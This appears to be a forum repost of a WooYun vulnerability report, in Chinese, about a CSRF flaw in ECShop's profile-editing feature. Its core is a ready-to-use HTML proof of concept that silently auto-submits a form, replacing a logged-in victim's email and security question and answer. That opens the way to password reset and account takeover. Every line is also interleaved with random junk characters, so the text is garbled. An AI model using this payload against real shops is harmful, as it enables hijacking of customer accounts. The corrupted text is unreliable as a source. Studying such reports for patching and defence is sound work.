简要描述:: L# j6 `8 z8 g: W, J& Q
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现' U2 n3 \ J( L& k
! B7 h9 \& }% C7 R8 v$ l [Demo For:http://www.wooyun.org/bug.php?action=view&id=395# J$ ?* G. p: V
* U q8 V3 W. G3 D( E5 C
详细说明:
?% f% U$ n- I1 x利用csrf和xss可以突破官方所说的“障碍”
: R! D6 T1 _% R5 G' W& X0 m; E% V; ?xss版本已经有人说明
4 Q. k; ]% v5 A这里给出csrf版本
2 j& h; r/ t% B9 v4 R# u7 b' ^. ^2 R
$ j$ d) n o( @; O* ^, e漏洞证明:1 a& G5 l5 K- U1 ^3 U& c1 b
<html>
S1 ]) }# A! g# e( u2 z. r( R& ~<body>
" y0 A" J7 y6 }7 z<form action="http://www.wooyun.org/ecshop/user.php" method="POST">) a3 ?4 d( o( c" I0 ?
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
0 B1 W" x& x, z. c<INPUT TYPE="text" NAME="act" value="act_edit_profile">. m1 B/ `4 ~6 U* l' [8 M) G: a
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
! y3 `# |. l, m) Z<INPUT TYPE="text" NAME="passwd_answer" value="exploit">6 S8 l/ C8 i) I( }. L& [
</body>
9 Z4 K9 J/ {6 Q7 f+ ]% e<script>7 r( T3 R& u) n8 o
document.forms[0].submit();
* X5 x* N% U P+ e; y5 Y5 Y</script>
$ f% Q, X$ ~% m8 s. a8 D; U' n% v</html>6 L7 B! y8 ^5 O* s( |$ y
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失$ ], H% ]) t* U8 p2 \$ ^" [
8 P2 {$ h4 V! C& g1 w |